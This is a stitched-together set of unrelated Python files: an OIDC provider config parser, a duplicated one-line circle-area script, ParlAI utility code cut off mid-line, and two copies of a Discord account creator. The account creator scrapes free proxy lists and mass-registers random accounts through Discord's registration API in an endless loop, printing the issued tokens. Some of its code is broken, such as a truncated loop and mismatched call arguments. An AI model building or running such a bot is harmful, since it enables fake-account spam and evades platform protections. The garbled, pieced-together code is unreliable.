oidc_config.get("client_secret_jwt_key") client_secret_jwt_key: Optional[OidcProviderClientSecretJwtKey] = None if client_secret_jwt_key_config is not None: keyfile = client_secret_jwt_key_config.get("key_file") if keyfile: key = read_file(keyfile, config_path + ("client_secret_jwt_key",)) else: key = client_secret_jwt_key_config["key"] client_secret_jwt_key = OidcProviderClientSecretJwtKey( key=key, jwt_header=client_secret_jwt_key_config["jwt_header"], jwt_payload=client_secret_jwt_key_config.get("jwt_payload", {}), ) # parse attribute_requirements from config (list of dicts) into a list of SsoAttributeRequirement attribute_requirements = [ SsoAttributeRequirement(**x) for x in oidc_config.get("attribute_requirements", []) ] return OidcProviderConfig( idp_id=idp_id, idp_name=oidc_config.get("idp_name", "OIDC"), idp_icon=idp_icon, idp_brand=oidc_config.get("idp_brand"), discover=oidc_config.get("discover", True), issuer=oidc_config["issuer"], client_id=oidc_config["client_id"], client_secret=oidc_config.get("client_secret"), client_secret_jwt_key=client_secret_jwt_key, client_auth_method=oidc_config.get("client_auth_method", "client_secret_basic"), scopes=oidc_config.get("scopes", ["openid"]), authorization_endpoint=oidc_config.get("authorization_endpoint"), token_endpoint=oidc_config.get("token_endpoint"), userinfo_endpoint=oidc_config.get("userinfo_endpoint"), jwks_uri=oidc_config.get("jwks_uri"), skip_verification=oidc_config.get("skip_verification", False), user_profile_method=oidc_config.get("user_profile_method", "auto"), allow_existing_users=oidc_config.get("allow_existing_users", False), user_mapping_provider_class=user_mapping_provider_class, user_mapping_provider_config=user_mapping_provider_config, attribute_requirements=attribute_requirements, ) @attr.s(slots=True, frozen=True, auto_attribs=True) class OidcProviderClientSecretJwtKey: # a pem-encoded signing key key: str # properties to include in the JWT header jwt_header: Mapping[str, str] # properties to include in the JWT payload. jwt_payload: Mapping[str, str] @attr.s(slots=True, frozen=True, auto_attribs=True) class OidcProviderConfig: # a unique identifier for this identity provider. Used in the 'user_external_ids' # table, as well as the query/path parameter used in the login protocol. idp_id: str # user-facing name for this identity provider. idp_name: str # Optional MXC URI for icon for this IdP. idp_icon: Optional[str] # Optional brand identifier for this IdP. idp_brand: Optional[str] # whether the OIDC discovery mechanism is used to discover endpoints discover: bool # the OIDC issuer. Used to validate tokens and (if discovery is enabled) to # discover the provider's endpoints. issuer: str # oauth2 client id to use client_id: str # oauth2 client secret to use. if `None`, use client_secret_jwt_key to generate # a secret. client_secret: Optional[str] # key to use to construct a JWT to use as a client secret. May be `None` if # `client_secret` is set. client_secret_jwt_key: Optional[OidcProviderClientSecretJwtKey] # auth method to use when exchanging the token. # Valid values are 'client_secret_basic', 'client_secret_post' and # 'none'. client_auth_method: str # list of scopes to request scopes: Collection[str] # the oauth2 authorization endpoint. Required if discovery is disabled. authorization_endpoint: Optional[str] # the oauth2 token endpoint. Required if discovery is disabled. token_endpoint: Optional[str] # the OIDC userinfo endpoint. Required if discovery is disabled and the # "openid" scope is not requested. userinfo_endpoint: Optional[str] # URI where to fetch the JWKS. Required if discovery is disabled and the # "openid" scope is used. jwks_uri: Optional[str] # Whether to skip metadata verification skip_verification: bool # Whether to fetch the user profile from the userinfo endpoint. Valid # values are: "auto" or "userinfo_endpoint". user_profile_method: str # whether to allow a user logging in via OIDC to match a pre-existing account # instead of failing allow_existing_users: bool # the class of the user mapping provider user_mapping_provider_class: Type # the config of the user mapping provider user_mapping_provider_config: Any # required attributes to require in userinfo to allow login/registration attribute_requirements: List[SsoAttributeRequirement]
# area of circle = pi(3.14159265359) * radius**2(π نق * نق) from math import pi print(f"area of circle is {pi * float(input("Enter radius: "))**2}") # in the above way we solved the problem with just one line after import library # you can solve it in many way. # good luck
# area of circle = pi(3.14159265359) * radius**2(π نق * نق) from math import pi print(f"area of circle is {pi * float(input('Enter radius: '))**2}") # in the above way we solved the problem with just one line after import library # you can solve it in many way. # good luck
from argparse import ArgumentParser from string import ascii_letters, digits from random import randint, choice from requests import get, post from requests_html import AsyncHTMLSession as a from threading import Thread # get 600 http(s) proxies, lists fplproxies.py async def 一(): return await a().get('https://free-proxy-list.net', timeout=30) # 300 async def 二(): return await a().get('https://www.us-proxy.org', timeout=30) # 200 async def 三(): return await a().get('https://www.sslproxies.org', timeout=30) # 100 threads2 = [] def fpl(): results = a().run(一, 二, 三) proxies = '' # to join lists for result in results: cells = result.html.find('td') s = '' # string to parse -> list for cell in cells: c = cell.text if not c.lower().islower(): # lowercase all letters and then check if islower to determine if the cell contains letters (only ip and port cells will remain) if '.' in c: c = '\n' + c + ':' # ip will have "." then add newline in front of ip to separate proxies \nip:port\nip:port s += c proxies += s fpl = [] for proxy in proxies.split('\n'): if proxy != '': fpl.append(proxy) return fpl # discrim-http(s).py def dac(proxylist, verbose): # todo: threads from time import time, strftime, gmtime # imported in def because of UnboundLocalError: local variable 'time' referenced before assignment d = 'https://discordapp.com/api/v6/users/@me' ua = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/' + \ '537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36' accounts = 0 start_time = time() for p in proxylist: l = f'{''.join([choice(ascii_letters + digits) for n in range(randint(9,12))])}@gmail.com' # login, email & pass try: t = post(f'{d[0:27]}auth/register', timeout=10, headers={'User-Agent': ua}, proxies={'http': 'http://' + p, 'https': 'http://' + p}, json={ 'consent': 'true', 'username': l.split('@')[0], 'email': l, 'password': l } ).json() if 'token' in t: accounts = accounts + 1 try: # get discrim # print(f'\033[96m'+get(d, timeout=20, headers={'User-Agent': ua, 'Authorization': t['token']}, proxies={'http': 'http://' + p, 'https': 'http://' + p} ).json()['discriminator'], l, t['token'], p, '\033[0m') except: try: # try again without proxy print(f'\033[96m'+get(d, timeout=30, headers={'User-Agent': ua, 'Authorization': t['token']} ).json()['discriminator'], l, t['token'], p, '\033[0m') except: # at least print token and login to later try to get discrim again manually with above req print(f'\033[96m????', l, t["token"], p, '\033[0m') else: if verbose == True: print(f'\u001b[38;5;90m{t} {p}\033[0m') # reg fail // -v commented out to only show success except: pass # timer and print loop stats time = strftime('%H:%M:%S', gmtime(time() - start_time)) print('\033[45;96maccounts created:', f'{accounts}. time elapsed: {time}. going again~=^.^=💫\033[0m') def main(): parser = ArgumentParser(description='discord account creator // async + proxies') parser.add_argument('-x', '--x', help='go through list only once and exit', action='store_true') parser.add_argument('-v', '--verbose', help='increase output verbosity', action='store_true') parser.add_argument('-t', '--threads', help='number of threads (default: 5)', type=int) parser.add_argument('-p', '--proxies', help='custom proxy list (ip:port' + '\\' + 'n)') args = parser.parse_args() v = args.verbose if args.threads: t = args.threads else: t = 5 if args.proxies: pl = [] with open(args.proxies) as proxies: for proxy in proxies.readlines(): pl.append(proxy.rstrip('\n')) else: # if no proxies provided, use free proxy lists. pl = fpl() print('Generating...💫') if args.x: dac(pl, v, t) else: # usually for running through a proxy list only once while True: dac(pl, v, t) def if_threads(thread_count): for i in range(thre if __name__ == "__main__": main()
from argparse import ArgumentParser from string import ascii_letters, digits from random import randint, choice from requests import get, post from requests_html import AsyncHTMLSession as a from threading import Thread # get 600 http(s) proxies, lists fplproxies.py async def 一(): return await a().get('https://free-proxy-list.net', timeout=30) # 300 async def 二(): return await a().get('https://www.us-proxy.org', timeout=30) # 200 async def 三(): return await a().get('https://www.sslproxies.org', timeout=30) # 100 threads2 = [] def fpl(): results = a().run(一, 二, 三) proxies = '' # to join lists for result in results: cells = result.html.find('td') s = '' # string to parse -> list for cell in cells: c = cell.text if not c.lower().islower(): # lowercase all letters and then check if islower to determine if the cell contains letters (only ip and port cells will remain) if '.' in c: c = '\n' + c + ':' # ip will have "." then add newline in front of ip to separate proxies \nip:port\nip:port s += c proxies += s fpl = [] for proxy in proxies.split('\n'): if proxy != '': fpl.append(proxy) return fpl # discrim-http(s).py def dac(proxylist, verbose): # todo: threads from time import time, strftime, gmtime # imported in def because of UnboundLocalError: local variable 'time' referenced before assignment d = 'https://discordapp.com/api/v6/users/@me' ua = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/' + \ '537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36' accounts = 0 start_time = time() for p in proxylist: l = f'{"".join([choice(ascii_letters + digits) for n in range(randint(9,12))])}@gmail.com' # login, email & pass try: t = post(f'{d[0:27]}auth/register', timeout=10, headers={'User-Agent': ua}, proxies={'http': 'http://' + p, 'https': 'http://' + p}, json={ 'consent': 'true', 'username': l.split('@')[0], 'email': l, 'password': l } ).json() if 'token' in t: accounts = accounts + 1 try: # get discrim # print(f'\033[96m'+get(d, timeout=20, headers={'User-Agent': ua, 'Authorization': t['token']}, proxies={'http': 'http://' + p, 'https': 'http://' + p} ).json()['discriminator'], l, t['token'], p, '\033[0m') except: try: # try again without proxy print(f'\033[96m'+get(d, timeout=30, headers={'User-Agent': ua, 'Authorization': t['token']} ).json()['discriminator'], l, t['token'], p, '\033[0m') except: # at least print token and login to later try to get discrim again manually with above req print(f'\033[96m????', l, t["token"], p, '\033[0m') else: if verbose == True: print(f'\u001b[38;5;90m{t} {p}\033[0m') # reg fail // -v commented out to only show success except: pass # timer and print loop stats time = strftime('%H:%M:%S', gmtime(time() - start_time)) print('\033[45;96maccounts created:', f'{accounts}. time elapsed: {time}. going again~=^.^=💫\033[0m') def main(): parser = ArgumentParser(description='discord account creator // async + proxies') parser.add_argument('-x', '--x', help='go through list only once and exit', action='store_true') parser.add_argument('-v', '--verbose', help='increase output verbosity', action='store_true') parser.add_argument('-t', '--threads', help='number of threads (default: 5)', type=int) parser.add_argument('-p', '--proxies', help='custom proxy list (ip:port' + '\\' + 'n)') args = parser.parse_args() v = args.verbose if args.threads: t = args.threads else: t = 5 if args.proxies: pl = [] with open(args.proxies) as proxies: for proxy in proxies.readlines(): pl.append(proxy.rstrip('\n')) else: # if no proxies provided, use free proxy lists. pl = fpl() print('Generating...💫') if args.x: dac(pl, v, t) else: # usually for running through a proxy list only once while True: dac(pl, v, t) def if_threads(thread_count): for i in range(thre if __name__ == "__main__": main()
#!/usr/bin/env python3 # Copyright (c) Facebook, Inc. and its affiliates. # This source code is licensed under the MIT license found in the # LICENSE file in the root directory of this source tree. """ File for miscellaneous utility functions and constants. """ from collections import deque import math import random import time from typing import Union, Optional, Set, Any, Dict, List import warnings import json from parlai.core.message import Message try: import torch __TORCH_AVAILABLE = True except ImportError: # silence the error, we'll have other problems later if it's super necessary __TORCH_AVAILABLE = False DISPLAY_MESSAGE_DEFAULT_FIELDS = { 'episode_done', 'id', 'image', 'text', 'labels', 'eval_labels', 'label_candidates', 'text_candidates', 'reward', 'eval_labels_vec', 'text_vec', 'label_candidates_vecs', 'token_losses', } def maintain_dialog_history( history, observation, reply='', historyLength=1, useReplies='label_else_model', dict=None, useStartEndIndices=True, splitSentences=False, ): """ Keep track of dialog history, up to a truncation length. Either includes replies from the labels, model, or not all using param 'replies'. DEPRECATED. USE PARLAI.CORE.TORCH_AGENT INSTEAD. """ def parse(txt, splitSentences): if dict is not None: if splitSentences: vec = [dict.txt2vec(t) for t in txt.split('\n')] else: vec = dict.txt2vec(txt) return vec else: return [txt] if 'dialog' not in history: history['dialog'] = deque(maxlen=historyLength) history['episode_done'] = False history['labels'] = [] if history['episode_done']: history['dialog'].clear() history['labels'] = [] useReplies = 'none' history['episode_done'] = False if useReplies != 'none': if useReplies == 'model' or ( useReplies == 'label_else_model' and len(history['labels']) == 0 ): if reply: if useStartEndIndices: reply = dict.start_token + ' ' + reply history['dialog'].extend(parse(reply, splitSentences)) elif len(history['labels']) > 0: r = history['labels'][0] history['dialog'].extend(parse(r, splitSentences)) obs = observation if 'text' in obs: if useStartEndIndices: obs['text'] = dict.end_token + ' ' + obs['text'] history['dialog'].extend(parse(obs['text'], splitSentences)) history['episode_done'] = obs['episode_done'] labels = obs.get('labels', obs.get('eval_labels', None)) if labels is not None: if useStartEndIndices: history['labels'] = [dict.start_token + ' ' + l for l in labels] else: history['labels'] = labels return history['dialog'] def load_cands(path, lines_have_ids=False, cands_are_replies=False): """ Load global fixed set of candidate labels that the teacher provides. Every example will include these as candidates. The true labels for a specific example are also added to this set, so that it's possible to get the right answer. """ if path is None: return None cands = [] cnt = 0 with open(path) as read: for line in read: line = line.strip().replace('\\n', '\n') if len(line) > 0: cnt = cnt + 1 # If lines are numbered we strip them of numbers. if cnt == 1 and line[0:2] == '1 ': lines_have_ids = True # If tabs then the label_candidates are all the replies. if '\t' in line and not cands_are_replies: cands_are_replies = True cands = [] if lines_have_ids: space_idx = line.find(' ') line = line[space_idx + 1 :] if cands_are_replies: sp = line.split('\t') if len(sp) > 1 and sp[1] != '': cands.append(sp[1]) else: cands.append(line) else: cands.append(line) return cands class Predictor(object): """ Wrapper to set up running version of model and request predictions. Note that this maintains no World state (does not use a World), merely providing the observation directly to the model and getting a response. This is limiting when it comes to certain use cases, but allows for quick model deployment. """ def __init__(self, args=None, **kwargs): """ Initialize the predictor, setting up opt automatically if needed. Args is expected to be in the same format as sys.argv: e.g. a list in the form ['--model', 'seq2seq', '-hs', 128, '-lr', 0.5]. kwargs is interpreted by appending '--' to it and replacing underscores with hyphens, so 'dict_file=/tmp/dict.tsv' would be interpreted as '--dict-file /tmp/dict.tsv'. """ from parlai.core.params import ParlaiParser from parlai.core.agents import create_agent if args is None: args = [] for k, v in kwargs.items(): args.append('--' + str(k).replace('_', '-')) args.append(str(v)) parser = ParlaiParser(True, True) self.opt = parser.parse_args(args) self.agent = create_agent(self.opt) def predict(self, observation): """ From a ParlAI-standard message dict, get model prediction. """ if 'episode_done' not in observation: observation['episode_done'] = True self.agent.observe(observation) reply = self.agent.act() return reply class Timer(object): """ Computes elapsed time. """ def __init__(self): """ Initialize timer. """ self.running = True self.total = 0 self.start = time.time() def reset(self): """ Reset timer to zero. """ self.running = True self.total = 0 self.start = time.time() return self def resume(self): """ Resume timer. """ if not self.running: self.running = True self.start = time.time() return self def stop(self): """ Pause timer. """ if self.running: self.running = False self.total += time.time() - self.start return self def time(self): """ Get current timer time. """ if self.running: return self.total + time.time() - self.start return self.total class TimeLogger: """ Class for logging time progress against a goal. """ def __init__(self): """ Set up timer. """ self.timer = Timer() self.tot_time = 0 def total_time(self): """ Return time elapsed at last log call. """ return self.tot_time def time(self): """ Return current timer time. """ return self.timer.time() def log(self, done, total, report=None): """ Log report, time elapsed, and percentage progress towards goal. :param done: number of examples completed so far :param total: total number of elements to be completed. if total > 0, calculates the time remaining and percentage complete. :param report: dict of pairs to log :returns: tuple log string, log dict log string contains time elapsed and string representation of the log dict log dict contains pairs of all items to log, which includes percentage complete and projected time left if total > 0 """ from parlai.core.metrics import Metric # delay import to prevent circular dep if isinstance(done, Metric): done = done.value() self.tot_time += self.timer.time() self.timer.reset() log = {} log['exs'] = done if total > 0: log['%done'] = done / total if log["%done"] > 0: time_left = self.tot_time / log['%done'] - self.tot_time log['time_left'] = str(int(time_left)) + 's' z = '%.2f' % (100 * log['%done']) log['%done'] = str(z) + '%' if report: log = {**report, **log} int_time = int(self.tot_time) report_s = json.dumps(nice_report(log)) text = f'{int_time}s elapsed: {report_s}' return text, log class AttrDict(dict): """ Helper class to have a dict-like object with dot access. For example, instead of `d = {'key': 'value'}` use `d = AttrDict(key='value')`. To access keys, instead of doing `d['key']` use `d.key`. While this has some limitations on the possible keys (for example, do not set the key `items` or you will lose access to the `items()` method), this can make some code more clear. """ def __init__(self, *args, **kwargs): """ Initialize AttrDict using input dict. """ super().__init__(*args, **kwargs) self.__dict__ = self class NoLock(object): """ Empty `lock`. Does nothing when you enter or exit. """ def __enter__(self): """ No-op. """ return self def __exit__(self, exc_type, exc_value, exc_traceback): """ No-op. """ pass def nice_report(report): from parlai.core.metrics import Metric output = {} for k, v in report.items(): if isinstance(v, Metric): v = v.value() if isinstance(v, float): v = round_sigfigs(v, 4) output[k] = v return output def round_sigfigs(x: Union[float, 'torch.Tensor'], sigfigs=4) -> float: """ Round value to specified significant figures. :param x: input number :param sigfigs: number of significant figures to return :returns: float number rounded to specified sigfigs """ x_: float if __TORCH_AVAILABLE and isinstance(x, torch.Tensor): x_ = x.item() else: x_ = x # type: ignore try: if x_ == 0: return 0 return round(x_, -math.floor(math.log10(abs(x_)) - sigfigs + 1)) except (ValueError, OverflowError) as ex: if x_ in [float('inf'), float('-inf')] or x_ != x_: # inf or nan return x_ else: raise ex single_nolock = NoLock() def no_lock(): """ Build a nolock for other classes to use for no-op locking. """ return single_nolock class PaddingUtils(object): """ Helps with padding input and target tensors. DEPRECATED. USE PARLAI.CORE.TORCH_AGENT INSTEAD. """ # DEPRECATIONDAY: delete! @classmethod def pad_text( cls, observations, dictionary, end_idx=None, null_idx=0, dq=False, eval_labels=True, truncate=None, ): """ Pad observations to max width. We check that examples are valid, pad with zeros, and sort by length so that we can use the pack_padded function. The list valid_inds keeps track of which indices are valid and the order in which we sort the examples. dq -- whether we should use deque or list eval_labels -- whether or not we want to consider eval labels truncate -- truncate input and output lengths DEPRECATED. USE PARLAI.CORE.TORCH_AGENT INSTEAD. """ def valid(obs): # check if this is an example our model should actually process return 'text' in obs and len(obs['text']) > 0 try: # valid examples and their indices valid_inds, exs = zip( *[(i, ex) for i, ex in enumerate(observations) if valid(ex)] ) except ValueError: # zero examples to process in this batch, so zip failed to unpack return None, None, None, None, None, None # `x` text is already tokenized and truncated # sort by length so we can use pack_padded if any(['text2vec' in ex for ex in exs]): parsed_x = [ex['text2vec'] for ex in exs] else: parsed_x = [dictionary.txt2vec(ex['text']) for ex in exs] if len(parsed_x) > 0 and not isinstance(parsed_x[0], deque): if dq: parsed_x = [deque(x, maxlen=truncate) for x in parsed_x] elif truncate is not None and truncate > 0: parsed_x = [x[-truncate:] for x in parsed_x] x_lens = [len(x) for x in parsed_x] ind_sorted = sorted(range(len(x_lens)), key=lambda k: -x_lens[k]) exs = [exs[k] for k in ind_sorted] valid_inds = [valid_inds[k] for k in ind_sorted] parsed_x = [parsed_x[k] for k in ind_sorted] end_idxs = [x_lens[k] for k in ind_sorted] eval_labels_avail = any(['eval_labels' in ex for ex in exs]) labels_avail = any(['labels' in ex for ex in exs]) if eval_labels: some_labels_avail = eval_labels_avail or labels_avail else: some_labels_avail = labels_avail max_x_len = max(x_lens) # pad with zeros if dq: parsed_x = [ x if len(x) == max_x_len else x + deque((null_idx,)) * (max_x_len - len(x)) for x in parsed_x ] else: parsed_x = [ x if len(x) == max_x_len else x + [null_idx] * (max_x_len - len(x)) for x in parsed_x ] xs = parsed_x # set up the target tensors ys = None labels = None y_lens = None if some_labels_avail: # randomly select one of the labels to update on (if multiple) if labels_avail: labels = [random.choice(ex.get('labels', [''])) for ex in exs] else: labels = [random.choice(ex.get('eval_labels', [''])) for ex in exs] # parse each label and append END if dq: parsed_y = [deque(maxlen=truncate) for _ in labels] for deq, y in zip(parsed_y, labels): deq.extendleft(reversed(dictionary.txt2vec(y))) else: parsed_y = [dictionary.txt2vec(label) for label in labels] if end_idx is not None: for y in parsed_y: y.append(end_idx) y_lens = [len(y) for y in parsed_y] max_y_len = max(y_lens) if dq: parsed_y = [ y if len(y) == max_y_len else y + deque((null_idx,)) * (max_y_len - len(y)) for y in parsed_y ] else: parsed_y = [ y if len(y) == max_y_len else y + [null_idx] * (max_y_len - len(y)) for y in parsed_y ] ys = parsed_y return xs, ys, labels, valid_inds, end_idxs, y_lens @classmethod def map_predictions( cls, predictions, valid_inds, batch_reply, observations, dictionary, end_idx, report_freq=0.1, labels=None, answers=None, ys=None, ): """ Match predictions to original index in the batch. Predictions are mapped back to appropriate indices in the batch_reply using valid_inds. report_freq -- how often we report predictions DEPRECATED. USE PARLAI.CORE.TORCH_AGENT INSTEAD. """ for i in range(len(predictions)): # map the predictions back to non-empty examples in the batch # we join with spaces since we produce tokens one at a timelab curr = batch_reply[valid_inds[i]] output_tokens = [] j = 0 for c in predictions[i]: if c == end_idx and j != 0: break else: output_tokens.append(c) j += 1 curr_pred = dictionary.vec2txt(output_tokens) curr['text'] = curr_pred if labels is not None and answers is not None and ys is not None: y = [] for c in ys[i]: if c == end_idx: break else: y.append(c) answers[valid_inds[i]] = y elif answers is not None: answers[valid_inds[i]] = curr_pred if random.random() > (1 - report_freq): # log sometimes print('TEXT: ', observations[valid_inds[i]]['text']) print('PREDICTION: ', curr_pred, '\n~') return def clip_text(text, max_len): """ Clip text to max length, adding ellipses. """ if len(text) > max_len: begin_text = ' '.join(text[: math.floor(0.8 * max_len)].split(' ')[:-1]) end_text = ' '.join( text[(len(text) - math.floor(0.2 * max_len)) :].split(' ')[1:] ) if len(end_text) > 0: text = begin_text + ' ...\n' + end_text else: text = begin_text + ' ...' return text def _ellipse(lst: List[str], max_display: int = 5, sep: str = '|') -> str: """ Like join, but possibly inserts an ellipsis. :param lst: The list to join on :param int max_display: the number of items to display for ellipsing. If -1, shows all items :param string sep: the delimiter to join on """ # copy the list (or force it to a list if it's a set) choices = list(lst) # insert the ellipsis if necessary if max_display > 0 and len(choices) > max_display: ellipsis = '...and {} more'.format(len(choices) - max_display) choices = choices[:max_display] + [ellipsis] return sep.join(str(c) for c in choices) def display_messages( msgs: List[Dict[str, Any]], prettify: bool = False, ignore_fields: str = '', max_len: int = 1000, ) -> Optional[str]: """ Return a string describing the set of messages provided. If prettify is true, candidates are displayed using prettytable. ignore_fields provides a list of fields in the msgs which should not be displayed. """ def _token_losses_line( msg: Dict[str, Any], ignore_fields: List[str], space: str ) -> Optional[str]: """ Displays the loss associated with each token. Can be used for debugging generative models. See TorchGeneratorAgent._construct_token_losses for an example implementation. """ key = 'token_losses' token_losses = msg.get(key, None) if key in ignore_fields or not token_losses: return None # Reduce losses to 4 significant figures formatted_tl = ' | '.join( [f"{tl[0]} {float("{:.4g}".format(tl[1]))}" for tl in token_losses] ) return f'{space}[{key}]: {formatted_tl}' lines = [] episode_done = False ignore_fields_ = ignore_fields.split(',') for index, msg in enumerate(msgs): if msg is None or (index == 1 and 'agent_reply' in ignore_fields_): # We only display the first agent (typically the teacher) if we # are ignoring the agent reply. continue if msg.get('episode_done'): episode_done = True # Possibly indent the text (for the second speaker, if two). space = '' if len(msgs) == 2 and index == 1: space = ' ' # Only display rewards !=0 as they are confusing in non-RL tasks. if msg.get('reward', 0) != 0: lines.append(space + '[reward: {r}]'.format(r=msg['reward'])) for key in msg: if key not in DISPLAY_MESSAGE_DEFAULT_FIELDS and key not in ignore_fields_: if type(msg[key]) is list: line = '[' + key + ']:\n ' + _ellipse(msg[key], sep='\n ') else: line = '[' + key + ']: ' + clip_text(str(msg.get(key)), max_len) lines.append(space + line) if type(msg.get('image')) in [str, torch.Tensor]: lines.append(f'[ image ]: {msg['image']}') if msg.get('text', ''): text = clip_text(msg['text'], max_len) ID = '[' + msg['id'] + ']: ' if 'id' in msg else '' lines.append(space + ID + text) for field in {'labels', 'eval_labels', 'label_candidates', 'text_candidates'}: if msg.get(field) and field not in ignore_fields_: lines.append('{}[{}: {}]'.format(space, field, _ellipse(msg[field]))) # Handling this separately since we need to clean up the raw output before displaying. token_loss_line = _token_losses_line(msg, ignore_fields_, space) if token_loss_line: lines.append(token_loss_line) if episode_done: lines.append('- - - - - - - - - - - - - - - - - - - - -') return '\n'.join(lines) def str_to_msg(txt, ignore_fields=''): """ Convert formatted string to ParlAI message dict. :param txt: formatted string to convert. String format is tab-separated fields, with colon separating field name and contents. :param ignore_fields: (default '') comma-separated field names to not include in the msg dict even if they're in the string. """ def tostr(txt): txt = str(txt) txt = txt.replace('\\t', '\t') txt = txt.replace('\\n', '\n') txt = txt.replace('__PIPE__', '|') return txt def tolist(txt): vals = txt.split('|') for v in vals: v = tostr(v) return vals def convert(key, value): if key == 'text' or key == 'id': return tostr(value) elif ( key == 'label_candidates' or key == 'labels' or key == 'eval_labels' or key == 'text_candidates' ): return tolist(value) elif key == 'episode_done': return bool(value) else: return tostr(value) if txt == '' or txt is None: return None msg = {} for t in txt.split('\t'): ind = t.find(':') key = t[:ind] value = t[ind + 1 :] if key not in ignore_fields.split(','): msg[key] = convert(key, value) msg['episode_done'] = msg.get('episode_done', False) return Message(msg) def msg_to_str(msg, ignore_fields=''): """ Convert ParlAI message dict to string. :param msg: dict to convert into a string. :param ignore_fields: (default '') comma-separated field names to not include in the string even if they're in the msg dict. """ def filter(txt): txt = str(txt) txt = txt.replace('\t', '\\t') txt = txt.replace('\n', '\\n') txt = txt.replace('|', '__PIPE__') return txt def add_field(name, data): if name == 'reward' and data == 0: return '' if name == 'episode_done' and data is False: return '' txt = '' if type(data) == tuple or type(data) == set or type(data) == list: # list entries for c in data: txt += filter(c) + "|" txt = txt[:-1] else: # single fields txt = filter(data) return name + ":" + txt + '\t' default_fields = [ 'id', 'text', 'labels', 'label_candidates', 'episode_done', 'reward', ] txt = "" ignore_fields = ignore_fields.split(',') for f in default_fields: if f in msg and f not in ignore_fields: txt += add_field(f, msg[f]) for f in msg.keys(): if f not in default_fields and f not in ignore_fields: txt += add_field(f, msg[f]) return txt.rstrip('\t') # DEPRECATION DAY: DELETE def set_namedtuple_defaults(namedtuple, default=None): """ Set *all* of the fields for a given nametuple to a singular value. Additionally removes the default docstring for each field. Modifies the tuple in place, but returns it anyway. More info: https://stackoverflow.com/a/18348004 :param namedtuple: A constructed collections.namedtuple :param default: The default value to set. :returns: the modified namedtuple """ namedtuple.__new__.__defaults__ = (default,) * len(namedtuple._fields) for f in namedtuple._fields: del getattr(namedtuple, f).__doc__ return namedtuple _seen_warnings: Set[str] = set() def warn_once(msg: str, warningtype=None) -> None: """ Raise a warning, but only once. :param str msg: Message to display :param Warning warningtype: Type of warning, e.g. DeprecationWarning """ global _seen_warnings if msg not in _seen_warnings: _seen_warnings.add(msg) warnings.warn(msg, warningtype, stacklevel=2)
#!/usr/bin/env python3 # Copyright (c) Facebook, Inc. and its affiliates. # This source code is licensed under the MIT license found in the # LICENSE file in the root directory of this source tree. """ File for miscellaneous utility functions and constants. """ from collections import deque import math import random import time from typing import Union, Optional, Set, Any, Dict, List import warnings import json from parlai.core.message import Message try: import torch __TORCH_AVAILABLE = True except ImportError: # silence the error, we'll have other problems later if it's super necessary __TORCH_AVAILABLE = False DISPLAY_MESSAGE_DEFAULT_FIELDS = { 'episode_done', 'id', 'image', 'text', 'labels', 'eval_labels', 'label_candidates', 'text_candidates', 'reward', 'eval_labels_vec', 'text_vec', 'label_candidates_vecs', 'token_losses', } def maintain_dialog_history( history, observation, reply='', historyLength=1, useReplies='label_else_model', dict=None, useStartEndIndices=True, splitSentences=False, ): """ Keep track of dialog history, up to a truncation length. Either includes replies from the labels, model, or not all using param 'replies'. DEPRECATED. USE PARLAI.CORE.TORCH_AGENT INSTEAD. """ def parse(txt, splitSentences): if dict is not None: if splitSentences: vec = [dict.txt2vec(t) for t in txt.split('\n')] else: vec = dict.txt2vec(txt) return vec else: return [txt] if 'dialog' not in history: history['dialog'] = deque(maxlen=historyLength) history['episode_done'] = False history['labels'] = [] if history['episode_done']: history['dialog'].clear() history['labels'] = [] useReplies = 'none' history['episode_done'] = False if useReplies != 'none': if useReplies == 'model' or ( useReplies == 'label_else_model' and len(history['labels']) == 0 ): if reply: if useStartEndIndices: reply = dict.start_token + ' ' + reply history['dialog'].extend(parse(reply, splitSentences)) elif len(history['labels']) > 0: r = history['labels'][0] history['dialog'].extend(parse(r, splitSentences)) obs = observation if 'text' in obs: if useStartEndIndices: obs['text'] = dict.end_token + ' ' + obs['text'] history['dialog'].extend(parse(obs['text'], splitSentences)) history['episode_done'] = obs['episode_done'] labels = obs.get('labels', obs.get('eval_labels', None)) if labels is not None: if useStartEndIndices: history['labels'] = [dict.start_token + ' ' + l for l in labels] else: history['labels'] = labels return history['dialog'] def load_cands(path, lines_have_ids=False, cands_are_replies=False): """ Load global fixed set of candidate labels that the teacher provides. Every example will include these as candidates. The true labels for a specific example are also added to this set, so that it's possible to get the right answer. """ if path is None: return None cands = [] cnt = 0 with open(path) as read: for line in read: line = line.strip().replace('\\n', '\n') if len(line) > 0: cnt = cnt + 1 # If lines are numbered we strip them of numbers. if cnt == 1 and line[0:2] == '1 ': lines_have_ids = True # If tabs then the label_candidates are all the replies. if '\t' in line and not cands_are_replies: cands_are_replies = True cands = [] if lines_have_ids: space_idx = line.find(' ') line = line[space_idx + 1 :] if cands_are_replies: sp = line.split('\t') if len(sp) > 1 and sp[1] != '': cands.append(sp[1]) else: cands.append(line) else: cands.append(line) return cands class Predictor(object): """ Wrapper to set up running version of model and request predictions. Note that this maintains no World state (does not use a World), merely providing the observation directly to the model and getting a response. This is limiting when it comes to certain use cases, but allows for quick model deployment. """ def __init__(self, args=None, **kwargs): """ Initialize the predictor, setting up opt automatically if needed. Args is expected to be in the same format as sys.argv: e.g. a list in the form ['--model', 'seq2seq', '-hs', 128, '-lr', 0.5]. kwargs is interpreted by appending '--' to it and replacing underscores with hyphens, so 'dict_file=/tmp/dict.tsv' would be interpreted as '--dict-file /tmp/dict.tsv'. """ from parlai.core.params import ParlaiParser from parlai.core.agents import create_agent if args is None: args = [] for k, v in kwargs.items(): args.append('--' + str(k).replace('_', '-')) args.append(str(v)) parser = ParlaiParser(True, True) self.opt = parser.parse_args(args) self.agent = create_agent(self.opt) def predict(self, observation): """ From a ParlAI-standard message dict, get model prediction. """ if 'episode_done' not in observation: observation['episode_done'] = True self.agent.observe(observation) reply = self.agent.act() return reply class Timer(object): """ Computes elapsed time. """ def __init__(self): """ Initialize timer. """ self.running = True self.total = 0 self.start = time.time() def reset(self): """ Reset timer to zero. """ self.running = True self.total = 0 self.start = time.time() return self def resume(self): """ Resume timer. """ if not self.running: self.running = True self.start = time.time() return self def stop(self): """ Pause timer. """ if self.running: self.running = False self.total += time.time() - self.start return self def time(self): """ Get current timer time. """ if self.running: return self.total + time.time() - self.start return self.total class TimeLogger: """ Class for logging time progress against a 